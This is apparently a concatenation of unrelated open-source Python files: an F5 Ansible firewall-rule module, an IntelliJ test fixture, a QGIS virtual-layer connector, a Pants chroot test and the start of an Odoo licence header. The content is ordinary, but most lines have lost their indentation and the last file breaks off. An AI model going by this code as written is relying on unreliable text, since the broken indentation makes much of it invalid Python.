if type == '255' and code == '255':
result.append("255")
elif type == '255' and code != '255':
raise F5ModuleError(
"A type of 'any' (255) requires a code of 'any'."
)
elif code == '255':
result.append(type)
else:
result.append('{0}:{1}'.format(type, code))
result = list(set(result))
return result
class Changes(Parameters):
def to_return(self):
result = {}
try:
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
except Exception:
pass
return result
class UsableChanges(Changes):
@property
def logging(self):
if self._values['logging'] is None:
return None
if self._values['logging'] is True:
return "yes"
return "no"
@property
def source(self):
if self._values['source'] is None:
return None
result = dict(
addresses=[],
addressLists=[],
vlans=[],
geo=[],
ports=[],
portLists=[]
)
for x in self._values['source']:
if x[0] == 'address':
result['addresses'].append({'name': x[1]})
elif x[0] == 'address_list':
result['addressLists'].append(x[1])
elif x[0] == 'vlan':
result['vlans'].append(x[1])
elif x[0] == 'geo':
result['geo'].append({'name': x[1]})
elif x[0] == 'port':
result['ports'].append({'name': str(x[1])})
elif x[0] == 'port_list':
result['portLists'].append(x[1])
return result
@property
def destination(self):
if self._values['destination'] is None:
return None
result = dict(
addresses=[],
addressLists=[],
vlans=[],
geo=[],
ports=[],
portLists=[]
)
for x in self._values['destination']:
if x[0] == 'address':
result['addresses'].append({'name': x[1]})
elif x[0] == 'address_list':
result['addressLists'].append(x[1])
elif x[0] == 'geo':
result['geo'].append({'name': x[1]})
elif x[0] == 'port':
result['ports'].append({'name': str(x[1])})
elif x[0] == 'port_list':
result['portLists'].append(x[1])
return result
@property
def icmp_message(self):
if self._values['icmp_message'] is None:
return None
result = []
for x in self._values['icmp_message']:
result.append({'name': x})
return result
class ReportableChanges(Changes):
@property
def source(self):
if self._values['source'] is None:
return None
result = []
v = self._values['source']
if v['addressLists']:
result += [('address_list', x) for x in v['addressLists']]
if v['vlans']:
result += [('vlan', x) for x in v['vlans']]
if v['geo']:
result += [('geo', x['name']) for x in v['geo']]
if v['addresses']:
result += [('address', x['name']) for x in v['addresses']]
        if v['ports']:
            result += [('port', str(x['name'])) for x in v['ports']]
        if v['portLists']:
            result += [('port_list', x) for x in v['portLists']]
if result:
return dict(result)
return None
@property
def destination(self):
if self._values['destination'] is None:
return None
result = []
v = self._values['destination']
if v['addressLists']:
result += [('address_list', x) for x in v['addressLists']]
if v['geo']:
result += [('geo', x['name']) for x in v['geo']]
if v['addresses']:
result += [('address', x['name']) for x in v['addresses']]
        if v['ports']:
            result += [('port', str(x['name'])) for x in v['ports']]
        if v['portLists']:
            result += [('port_list', x) for x in v['portLists']]
if result:
return dict(result)
return None
class Difference(object):
def __init__(self, want, have=None):
self.want = want
self.have = have
def compare(self, param):
try:
result = getattr(self, param)
return result
except AttributeError:
return self.__default(param)
def __default(self, param):
attr1 = getattr(self.want, param)
try:
attr2 = getattr(self.have, param)
if attr1 != attr2:
return attr1
except AttributeError:
return attr1
@property
def irule(self):
if self.want.irule is None:
return None
if self.have.irule is None and self.want.irule == '':
return None
if self.have.irule is None:
return self.want.irule
if self.want.irule != self.have.irule:
return self.want.irule
@property
def description(self):
if self.want.description is None:
return None
if self.have.description is None and self.want.description == '':
return None
if self.have.description is None:
return self.want.description
if self.want.description != self.have.description:
return self.want.description
@property
def source(self):
if self.want.source is None:
return None
if self.want.source is None and self.have.source is None:
return None
if self.have.source is None:
return self.want.source
if set(self.want.source) != set(self.have.source):
return self.want.source
@property
def destination(self):
if self.want.destination is None:
return None
if self.want.destination is None and self.have.destination is None:
return None
if self.have.destination is None:
return self.want.destination
if set(self.want.destination) != set(self.have.destination):
return self.want.destination
@property
def icmp_message(self):
if self.want.icmp_message is None:
return None
if self.want.icmp_message is None and self.have.icmp_message is None:
return None
if self.have.icmp_message is None:
return self.want.icmp_message
if set(self.want.icmp_message) != set(self.have.icmp_message):
return self.want.icmp_message
class ModuleManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = F5RestClient(**self.module.params)
self.want = ModuleParameters(params=self.module.params)
self.have = ApiParameters()
self.changes = UsableChanges()
def _set_changed_options(self):
changed = {}
for key in Parameters.returnables:
if getattr(self.want, key) is not None:
changed[key] = getattr(self.want, key)
if changed:
self.changes = UsableChanges(params=changed)
def _update_changed_options(self):
diff = Difference(self.want, self.have)
updatables = Parameters.updatables
changed = dict()
for k in updatables:
change = diff.compare(k)
if change is None:
continue
else:
if isinstance(change, dict):
changed.update(change)
else:
changed[k] = change
if changed:
self.changes = UsableChanges(params=changed)
return True
return False
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def exec_module(self):
changed = False
result = dict()
state = self.want.state
if state == "present":
changed = self.present()
elif state == "absent":
changed = self.absent()
reportable = ReportableChanges(params=self.changes.to_return())
changes = reportable.to_return()
result.update(**changes)
result.update(dict(changed=changed))
self._announce_deprecations(result)
return result
def _announce_deprecations(self, result):
warnings = result.pop('__warnings', [])
for warning in warnings:
            self.module.deprecate(
msg=warning['msg'],
version=warning['version']
)
def present(self):
if self.exists():
return self.update()
else:
return self.create()
def exists(self):
if self.want.parent_policy:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/policy/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_policy),
self.want.name
)
else:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/rule-list/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_rule_list),
self.want.name
)
resp = self.client.api.get(uri)
if resp.ok:
return True
return False
def update(self):
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.module.check_mode:
return True
self.update_on_device()
return True
def remove(self):
if self.module.check_mode:
return True
self.remove_from_device()
if self.exists():
raise F5ModuleError("Failed to delete the resource.")
return True
def create(self):
self._set_changed_options()
if self.want.rule_list is None and self.want.parent_rule_list is None:
if self.want.action is None:
self.changes.update({'action': 'reject'})
if self.want.logging is None:
self.changes.update({'logging': False})
if self.want.status is None:
self.changes.update({'status': 'enabled'})
if self.want.status == 'scheduled' and self.want.schedule is None:
raise F5ModuleError(
"A 'schedule' must be specified when 'status' is 'scheduled'."
)
if self.module.check_mode:
return True
self.create_on_device()
return True
def create_on_device(self):
params = self.changes.api_params()
params['name'] = self.want.name
params['partition'] = self.want.partition
params['placeAfter'] = 'last'
if self.want.parent_policy:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/policy/{2}/rules/".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_policy),
)
else:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/rule-list/{2}/rules/".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_rule_list),
)
if self.changes.protocol not in ['icmp', 'icmpv6']:
if self.changes.icmp_message is not None:
raise F5ModuleError(
"The 'icmp_message' can only be specified when 'protocol' is 'icmp' or 'icmpv6'."
)
resp = self.client.api.post(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] in [400, 403]:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def update_on_device(self):
if self.want.parent_policy:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/policy/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_policy),
self.want.name
)
else:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/rule-list/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_rule_list),
self.want.name
)
if self.have.protocol not in ['icmp', 'icmpv6'] and self.changes.protocol not in ['icmp', 'icmpv6']:
if self.changes.icmp_message is not None:
raise F5ModuleError(
"The 'icmp_message' can only be specified when 'protocol' is 'icmp' or 'icmpv6'."
)
if self.changes.protocol in ['icmp', 'icmpv6']:
self.changes.update({'source': {}})
self.changes.update({'destination': {}})
params = self.changes.api_params()
resp = self.client.api.patch(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def absent(self):
if self.exists():
return self.remove()
return False
def remove_from_device(self):
if self.want.parent_policy:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/policy/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_policy),
self.want.name
)
else:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/rule-list/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_rule_list),
self.want.name
)
resp = self.client.api.delete(uri)
if resp.status == 200:
return True
def read_current_from_device(self):
if self.want.parent_policy:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/policy/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_policy),
self.want.name
)
else:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/rule-list/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_rule_list),
self.want.name
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
return ApiParameters(params=response)
class ArgumentSpec(object):
def __init__(self):
self.supports_check_mode = True
argument_spec = dict(
name=dict(required=True),
parent_policy=dict(),
parent_rule_list=dict(),
logging=dict(type='bool'),
protocol=dict(),
irule=dict(),
description=dict(),
source=dict(
type='list',
elements='dict',
options=dict(
address=dict(),
address_list=dict(),
address_range=dict(),
country=dict(),
port=dict(type='int'),
port_list=dict(),
port_range=dict(),
vlan=dict(),
),
mutually_exclusive=[[
'address', 'address_list', 'address_range', 'country', 'vlan',
'port', 'port_range', 'port_list'
]]
),
destination=dict(
type='list',
elements='dict',
options=dict(
address=dict(),
address_list=dict(),
address_range=dict(),
country=dict(),
port=dict(type='int'),
port_list=dict(),
port_range=dict(),
),
mutually_exclusive=[[
'address', 'address_list', 'address_range', 'country',
'port', 'port_range', 'port_list'
]]
),
action=dict(
choices=['accept', 'drop', 'reject', 'accept-decisively']
),
status=dict(
choices=['enabled', 'disabled', 'scheduled']
),
schedule=dict(),
rule_list=dict(),
icmp_message=dict(
type='list',
elements='dict',
options=dict(
type=dict(),
code=dict(),
)
),
partition=dict(
default='Common',
fallback=(env_fallback, ['F5_PARTITION'])
),
state=dict(
default='present',
choices=['present', 'absent']
)
)
self.argument_spec = {}
self.argument_spec.update(f5_argument_spec)
self.argument_spec.update(argument_spec)
self.mutually_exclusive = [
['rule_list', 'action'],
['rule_list', 'source'],
['rule_list', 'destination'],
['rule_list', 'irule'],
['rule_list', 'protocol'],
['rule_list', 'logging'],
['parent_policy', 'parent_rule_list']
]
self.required_one_of = [
['parent_policy', 'parent_rule_list']
]
def main():
spec = ArgumentSpec()
module = AnsibleModule(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode,
mutually_exclusive=spec.mutually_exclusive,
required_one_of=spec.required_one_of
)
try:
mm = ModuleManager(module=module)
results = mm.exec_module()
module.exit_json(**results)
except F5ModuleError as ex:
module.fail_json(msg=str(ex))
if __name__ == '__main__':
main()
|
paplorinc/intellij-community | refs/heads/master | python/testData/inspections/ConvertSingleQuotedDocstring.py | 83 | def foo():
<weak_warning descr="Triple double-quoted strings should be used for docstrings."><caret>'''</weak_warning>foo first line docstring
second line of docstring<weak_warning descr="Triple double-quoted strings should be used for docstrings.">'''</weak_warning>
pass |
ahuarte47/QGIS | refs/heads/master | python/plugins/db_manager/db_plugins/vlayers/connector.py | 19 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
Name : Virtual layers plugin for DB Manager
Date : December 2015
copyright : (C) 2015 by Hugo Mercier
email : hugo dot mercier at oslandia dot com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from qgis.PyQt.QtCore import QUrl, QTemporaryFile
from ..connector import DBConnector
from ..plugin import Table
from qgis.core import (
QgsDataSourceUri,
QgsVirtualLayerDefinition,
QgsProject,
QgsMapLayerType,
QgsVectorLayer,
QgsCoordinateReferenceSystem,
QgsWkbTypes
)
import sqlite3
class sqlite3_connection(object):
def __init__(self, sqlite_file):
self.conn = sqlite3.connect(sqlite_file)
def __enter__(self):
return self.conn
def __exit__(self, type, value, traceback):
self.conn.close()
def getQueryGeometryName(sqlite_file):
# introspect the file
with sqlite3_connection(sqlite_file) as conn:
c = conn.cursor()
for r in c.execute("SELECT url FROM _meta"):
d = QgsVirtualLayerDefinition.fromUrl(QUrl(r[0]))
if d.hasDefinedGeometry():
return d.geometryField()
return None
def classFactory():
return VLayerConnector
# Tables in DB Manager are identified by their display names
# This global registry maps a display name with a layer id
# It is filled when getVectorTables is called
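# For example (layer name purely illustrative): once getVectorTables() has run,
# a layer displayed as "rivers" can be resolved back to its QgsVectorLayer with
# VLayerRegistry.instance().getLayer("rivers"); when two layers share a display
# name, the registry falls back to using the layer id as the key.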
class VLayerRegistry(object):
_instance = None
@classmethod
def instance(cls):
if cls._instance is None:
cls._instance = VLayerRegistry()
return cls._instance
def __init__(self):
self.layers = {}
def reset(self):
self.layers = {}
def has(self, k):
return k in self.layers
def get(self, k):
return self.layers.get(k)
def __getitem__(self, k):
return self.get(k)
def set(self, k, l):
self.layers[k] = l
def __setitem__(self, k, l):
self.set(k, l)
def items(self):
return list(self.layers.items())
def getLayer(self, l):
lid = self.layers.get(l)
if lid is None:
return lid
if lid not in QgsProject.instance().mapLayers().keys():
self.layers.pop(l)
return None
return QgsProject.instance().mapLayer(lid)
class VLayerConnector(DBConnector):
def __init__(self, uri):
pass
def _execute(self, cursor, sql):
# This is only used to get list of fields
class DummyCursor(object):
def __init__(self, sql):
self.sql = sql
def close(self):
pass
return DummyCursor(sql)
def _get_cursor(self, name=None):
# fix_print_with_import
print(("_get_cursor_", name))
def _get_cursor_columns(self, c):
tf = QTemporaryFile()
tf.open()
tmp = tf.fileName()
tf.close()
df = QgsVirtualLayerDefinition()
df.setFilePath(tmp)
df.setQuery(c.sql)
p = QgsVectorLayer(df.toString(), "vv", "virtual")
if not p.isValid():
return []
f = [f.name() for f in p.fields()]
if p.geometryType() != QgsWkbTypes.NullGeometry:
gn = getQueryGeometryName(tmp)
if gn:
f += [gn]
return f
def uri(self):
return QgsDataSourceUri("qgis")
def getInfo(self):
return "info"
def getSpatialInfo(self):
return None
def hasSpatialSupport(self):
return True
def hasRasterSupport(self):
return False
def hasCustomQuerySupport(self):
return True
def hasTableColumnEditingSupport(self):
return False
def fieldTypes(self):
return [
"integer", "bigint", "smallint", # integers
"real", "double", "float", "numeric", # floats
"varchar", "varchar(255)", "character(20)", "text", # strings
"date", "datetime" # date/time
]
def getSchemas(self):
return None
def getTables(self, schema=None, add_sys_tables=False):
""" get list of tables """
return self.getVectorTables()
def getVectorTables(self, schema=None):
""" get list of table with a geometry column
it returns:
name (table name)
is_system_table
type = 'view' (is a view?)
geometry_column:
f_table_name (the table name in geometry_columns may be in a wrong case, use this to load the layer)
f_geometry_column
type
coord_dimension
srid
"""
reg = VLayerRegistry.instance()
VLayerRegistry.instance().reset()
lst = []
for _, l in QgsProject.instance().mapLayers().items():
if l.type() == QgsMapLayerType.VectorLayer:
lname = l.name()
# if there is already a layer with this name, use the layer id
# as name
if reg.has(lname):
lname = l.id()
VLayerRegistry.instance().set(lname, l.id())
geomType = None
dim = None
g = l.dataProvider().wkbType()
if g == QgsWkbTypes.Point:
geomType = 'POINT'
dim = 'XY'
elif g == QgsWkbTypes.LineString:
geomType = 'LINESTRING'
dim = 'XY'
elif g == QgsWkbTypes.Polygon:
geomType = 'POLYGON'
dim = 'XY'
elif g == QgsWkbTypes.MultiPoint:
geomType = 'MULTIPOINT'
dim = 'XY'
elif g == QgsWkbTypes.MultiLineString:
geomType = 'MULTILINESTRING'
dim = 'XY'
elif g == QgsWkbTypes.MultiPolygon:
geomType = 'MULTIPOLYGON'
dim = 'XY'
elif g == QgsWkbTypes.Point25D:
geomType = 'POINT'
dim = 'XYZ'
elif g == QgsWkbTypes.LineString25D:
geomType = 'LINESTRING'
dim = 'XYZ'
elif g == QgsWkbTypes.Polygon25D:
geomType = 'POLYGON'
dim = 'XYZ'
elif g == QgsWkbTypes.MultiPoint25D:
geomType = 'MULTIPOINT'
dim = 'XYZ'
elif g == QgsWkbTypes.MultiLineString25D:
geomType = 'MULTILINESTRING'
dim = 'XYZ'
elif g == QgsWkbTypes.MultiPolygon25D:
geomType = 'MULTIPOLYGON'
dim = 'XYZ'
lst.append(
(Table.VectorType, lname, False, False, l.id(), 'geometry', geomType, dim, l.crs().postgisSrid()))
return lst
def getRasterTables(self, schema=None):
return []
def getTableRowCount(self, table):
t = table[1]
l = VLayerRegistry.instance().getLayer(t)
if not l or not l.isValid():
return None
return l.featureCount()
def getTableFields(self, table):
""" return list of columns in table """
t = table[1]
l = VLayerRegistry.instance().getLayer(t)
if not l or not l.isValid():
return []
# id, name, type, nonnull, default, pk
n = l.dataProvider().fields().size()
f = [(i, f.name(), f.typeName(), False, None, False)
for i, f in enumerate(l.dataProvider().fields())]
f += [(n, "geometry", "geometry", False, None, False)]
return f
def getTableIndexes(self, table):
return []
def getTableConstraints(self, table):
return None
def getTableTriggers(self, table):
return []
def deleteTableTrigger(self, trigger, table=None):
return
def getTableExtent(self, table, geom):
is_id, t = table
if is_id:
l = QgsProject.instance().mapLayer(t)
else:
l = VLayerRegistry.instance().getLayer(t)
if not l or not l.isValid():
return None
e = l.extent()
r = (e.xMinimum(), e.yMinimum(), e.xMaximum(), e.yMaximum())
return r
def getViewDefinition(self, view):
print("**unimplemented** getViewDefinition")
def getSpatialRefInfo(self, srid):
crs = QgsCoordinateReferenceSystem(srid)
return crs.description()
def isVectorTable(self, table):
return True
def isRasterTable(self, table):
return False
def createTable(self, table, field_defs, pkey):
print("**unimplemented** createTable")
return False
def deleteTable(self, table):
print("**unimplemented** deleteTable")
return False
def emptyTable(self, table):
print("**unimplemented** emptyTable")
return False
def renameTable(self, table, new_table):
print("**unimplemented** renameTable")
return False
def moveTable(self, table, new_table, new_schema=None):
print("**unimplemented** moveTable")
return False
def createView(self, view, query):
print("**unimplemented** createView")
return False
def deleteView(self, view):
print("**unimplemented** deleteView")
return False
def renameView(self, view, new_name):
print("**unimplemented** renameView")
return False
def runVacuum(self):
print("**unimplemented** runVacuum")
return False
def addTableColumn(self, table, field_def):
print("**unimplemented** addTableColumn")
return False
def deleteTableColumn(self, table, column):
print("**unimplemented** deleteTableColumn")
def updateTableColumn(self, table, column, new_name, new_data_type=None, new_not_null=None, new_default=None, comment=None):
print("**unimplemented** updateTableColumn")
def renameTableColumn(self, table, column, new_name):
print("**unimplemented** renameTableColumn")
return False
def setColumnType(self, table, column, data_type):
print("**unimplemented** setColumnType")
return False
def setColumnDefault(self, table, column, default):
print("**unimplemented** setColumnDefault")
return False
def setColumnNull(self, table, column, is_null):
print("**unimplemented** setColumnNull")
return False
def isGeometryColumn(self, table, column):
print("**unimplemented** isGeometryColumn")
return False
def addGeometryColumn(self, table, geom_column='geometry', geom_type='POINT', srid=-1, dim=2):
print("**unimplemented** addGeometryColumn")
return False
def deleteGeometryColumn(self, table, geom_column):
print("**unimplemented** deleteGeometryColumn")
return False
def addTableUniqueConstraint(self, table, column):
print("**unimplemented** addTableUniqueConstraint")
return False
def deleteTableConstraint(self, table, constraint):
print("**unimplemented** deleteTableConstraint")
return False
def addTablePrimaryKey(self, table, column):
print("**unimplemented** addTablePrimaryKey")
return False
def createTableIndex(self, table, name, column, unique=False):
print("**unimplemented** createTableIndex")
return False
def deleteTableIndex(self, table, name):
print("**unimplemented** deleteTableIndex")
return False
def createSpatialIndex(self, table, geom_column='geometry'):
print("**unimplemented** createSpatialIndex")
return False
def deleteSpatialIndex(self, table, geom_column='geometry'):
print("**unimplemented** deleteSpatialIndex")
return False
def hasSpatialIndex(self, table, geom_column='geometry'):
print("**unimplemented** hasSpatialIndex")
return False
def execution_error_types(self):
print("**unimplemented** execution_error_types")
return False
def connection_error_types(self):
print("**unimplemented** connection_error_types")
return False
def getSqlDictionary(self):
from .sql_dictionary import getSqlDictionary
sql_dict = getSqlDictionary()
items = []
for tbl in self.getTables():
items.append(tbl[1]) # table name
for fld in self.getTableFields((None, tbl[1])):
items.append(fld[1]) # field name
sql_dict["identifier"] = items
return sql_dict
def getQueryBuilderDictionary(self):
from .sql_dictionary import getQueryBuilderDictionary
return getQueryBuilderDictionary()
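# A minimal sketch (illustrative only, and an assumption rather than part of
# this connector) of the kind of statement a concrete backend might issue for
# one of the stubbed operations above, here addGeometryColumn against a
# SpatiaLite-style database; a real implementation would execute the returned
# SQL through its own connection.
def _example_add_geometry_column_sql(table, geom_column='geometry',
                                     geom_type='POINT', srid=-1, dim=2):
    return u"SELECT AddGeometryColumn('%s', '%s', %d, '%s', %d)" % (
        table, geom_column, srid, geom_type, dim)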
|
dturner-tw/pants | refs/heads/master | tests/python/pants_test/backend/python/test_python_chroot.py | 2 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import os
import subprocess
from contextlib import contextmanager
from textwrap import dedent
from pex.pex_builder import PEXBuilder
from pex.platforms import Platform
from pants.backend.codegen.targets.python_antlr_library import PythonAntlrLibrary
from pants.backend.codegen.targets.python_thrift_library import PythonThriftLibrary
# TODO(John Sirois): XXX this dep needs to be fixed. All pants/java utility code needs to live
# in pants java since non-jvm backends depend on it to run things.
from pants.backend.jvm.subsystems.jvm import JVM
from pants.backend.python.interpreter_cache import PythonInterpreterCache
from pants.backend.python.python_chroot import PythonChroot
from pants.backend.python.python_requirement import PythonRequirement
from pants.backend.python.python_setup import PythonRepos, PythonSetup
from pants.backend.python.targets.python_binary import PythonBinary
from pants.backend.python.targets.python_library import PythonLibrary
from pants.backend.python.targets.python_requirement_library import PythonRequirementLibrary
from pants.binaries.thrift_binary import ThriftBinary
from pants.ivy.bootstrapper import Bootstrapper
from pants.ivy.ivy_subsystem import IvySubsystem
from pants.source.source_root import SourceRootConfig
from pants.util.contextutil import temporary_dir
from pants_test.base_test import BaseTest
from pants_test.subsystem.subsystem_util import create_subsystem, subsystem_instance
def test_get_current_platform():
expected_platforms = [Platform.current(), 'linux-x86_64']
assert set(expected_platforms) == set(PythonChroot.get_platforms(['current', 'linux-x86_64']))
class PythonChrootTest(BaseTest):
def setUp(self):
# Capture PythonSetup with the real BUILD_ROOT before that is reset to a tmpdir by super.
with subsystem_instance(PythonSetup) as python_setup:
self.python_setup = python_setup
super(PythonChrootTest, self).setUp()
@contextmanager
def dumped_chroot(self, targets):
python_repos = create_subsystem(PythonRepos)
with subsystem_instance(IvySubsystem) as ivy_subsystem:
ivy_bootstrapper = Bootstrapper(ivy_subsystem=ivy_subsystem)
with subsystem_instance(ThriftBinary.Factory) as thrift_binary_factory:
interpreter_cache = PythonInterpreterCache(self.python_setup, python_repos)
interpreter_cache.setup()
interpreters = list(interpreter_cache.matched_interpreters([
self.python_setup.interpreter_requirement]))
self.assertGreater(len(interpreters), 0)
interpreter = interpreters[0]
with temporary_dir() as chroot:
pex_builder = PEXBuilder(path=chroot, interpreter=interpreter)
python_chroot = PythonChroot(python_setup=self.python_setup,
python_repos=python_repos,
ivy_bootstrapper=ivy_bootstrapper,
thrift_binary_factory=thrift_binary_factory.create,
interpreter=interpreter,
builder=pex_builder,
targets=targets,
platforms=['current'])
try:
python_chroot.dump()
yield pex_builder, python_chroot
finally:
python_chroot.delete()
def test_antlr(self):
self.create_file(relpath='src/antlr/word/word.g', contents=dedent("""
grammar word;
options {
language=Python;
output=AST;
}
WORD: ('a'..'z'|'A'..'Z'|'!')+;
word_up: WORD (' ' WORD)*;
"""))
antlr_target = self.make_target(spec='src/antlr/word',
target_type=PythonAntlrLibrary,
antlr_version='3.1.3',
sources=['word.g'],
module='word')
# TODO: see 3rdparty/python/BUILD
antlr3_requirement = PythonRequirement('antlr_python_runtime==3.1.3',
repository='http://www.antlr3.org/download/Python/')
antlr3 = self.make_target(spec='3rdparty/python:antlr3',
target_type=PythonRequirementLibrary,
requirements=[antlr3_requirement])
self.create_file(relpath='src/python/test/main.py', contents=dedent("""
import antlr3
from word import wordLexer, wordParser
def word_up():
input = 'Hello World!'
char_stream = antlr3.ANTLRStringStream(input)
lexer = wordLexer.wordLexer(char_stream)
tokens = antlr3.CommonTokenStream(lexer)
parser = wordParser.wordParser(tokens)
def print_node(node):
print(node.text)
visitor = antlr3.tree.TreeVisitor()
visitor.visit(parser.word_up().tree, pre_action=print_node)
"""))
binary = self.make_target(spec='src/python/test',
target_type=PythonBinary,
source='main.py',
dependencies=[antlr_target, antlr3])
# TODO(John Sirois): This hacks around a direct but undeclared dependency
# `pants.java.distribution.distribution.Distribution` gained in
# https://rbcommons.com/s/twitter/r/2657
# Remove this once proper Subsystem dependency chains are re-established.
with subsystem_instance(JVM):
# TODO(benjy): This hacks around PythonChroot's dependency on source roots.
# See do_test_thrift() for more details. Remove this when we have a better way.
with subsystem_instance(SourceRootConfig):
with self.dumped_chroot([binary]) as (pex_builder, python_chroot):
pex_builder.set_entry_point('test.main:word_up')
pex_builder.freeze()
pex = python_chroot.pex()
process = pex.run(blocking=False, stdout=subprocess.PIPE)
stdout, _ = process.communicate()
self.assertEqual(0, process.returncode)
self.assertEqual(['Hello', ' ', 'World!'], stdout.splitlines())
@contextmanager
def do_test_thrift(self, inspect_chroot=None):
# TODO(benjy): This hacks around PythonChroot's dependency on source roots.
# Most tests get SourceRoot functionality set up for them by their test context.
# However PythonChroot isn't a task and doesn't use context. Rather it accesses source roots
# directly via Target.target_base. Remove this when we have a better way.
with subsystem_instance(SourceRootConfig):
self.create_file(relpath='src/thrift/core/identifiers.thrift', contents=dedent("""
namespace py core
const string HELLO = "Hello"
const string WORLD = "World!"
"""))
core_const = self.make_target(spec='src/thrift/core',
target_type=PythonThriftLibrary,
sources=['identifiers.thrift'])
self.create_file(relpath='src/thrift/test/const.thrift', contents=dedent("""
namespace py test
include "core/identifiers.thrift"
const list<string> MESSAGE = [identifiers.HELLO, identifiers.WORLD]
"""))
test_const = self.make_target(spec='src/thrift/test',
target_type=PythonThriftLibrary,
sources=['const.thrift'],
dependencies=[core_const])
self.create_file(relpath='src/python/test/main.py', contents=dedent("""
from test.constants import MESSAGE
def say_hello():
print(' '.join(MESSAGE))
"""))
binary = self.make_target(spec='src/python/test',
target_type=PythonBinary,
source='main.py',
dependencies=[test_const])
yield binary, test_const
with self.dumped_chroot([binary]) as (pex_builder, python_chroot):
pex_builder.set_entry_point('test.main:say_hello')
pex_builder.freeze()
pex = python_chroot.pex()
process = pex.run(blocking=False, stdout=subprocess.PIPE)
stdout, _ = process.communicate()
self.assertEqual(0, process.returncode)
self.assertEqual('Hello World!', stdout.strip())
if inspect_chroot:
inspect_chroot(python_chroot)
def test_thrift(self):
with self.do_test_thrift():
pass # Run the test on a standard isolated pure python target graph.
def test_thrift_issues_1858(self):
# Confirm a synthetic target for our python_thrift_library from some upstream task does not
# trample the PythonChroot/PythonThriftBuilder generated code.
# In https://github.com/pantsbuild/pants/issues/1858 the ApacheThriftGen task in the 'gen'
# phase upstream of the 'binary' goal was injecting a synthetic python_library target owning
# thrift generated code _and_ that code was a subset of all the code generated by thrift; ie:
# there was a synthetic python_library being added directly to the chroot missing some thrift
# codegened '.py' files, leading to import of those files (and errors) instead of the
# PythonChroot/PythonThriftBuilder generated files (packaged as deps in the PythonChroot).
with self.do_test_thrift() as (binary, thrift_target):
self.create_file(relpath='.synthetic/test/python/__init__.py')
self.create_file(relpath='.synthetic/test/python/constants.py', contents=dedent("""
VALID_IDENTIFIERS = ['generated', 'by', 'upstream', 'and', 'different!']
"""))
synthetic_pythrift_codegen_target = self.make_target(spec='.synthetic/test/python:constants',
target_type=PythonLibrary,
sources=['__init__.py', 'constants.py'],
derived_from=thrift_target)
binary.inject_dependency(synthetic_pythrift_codegen_target.address)
def test_thrift_issues_2005(self):
# Issue #2005 highlighted the fact the PythonThriftBuilder was building both a given
# PythonThriftLibrary's thrift files as well as its transitive dependencies thrift files.
# We test here that the generated chroot only contains 1 copy of each thrift stub in the face
# of transitive thrift deps.
def inspect_chroot(python_chroot):
all_constants_files = set()
for root, _, files in os.walk(python_chroot.path()):
all_constants_files.update(os.path.join(root, f) for f in files if f == 'constants.py')
# If core/constants.py was included in test/ we'd have 2 copies of core/constants.py plus
# test/constants.py for a total of 3 constants.py files.
self.assertEqual(2, len(all_constants_files))
with self.do_test_thrift(inspect_chroot=inspect_chroot):
pass # Our test takes place in inspect_chroot above
|
moylop260/odoo-dev | refs/heads/master | addons/website_event/__init__.py | 1577 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
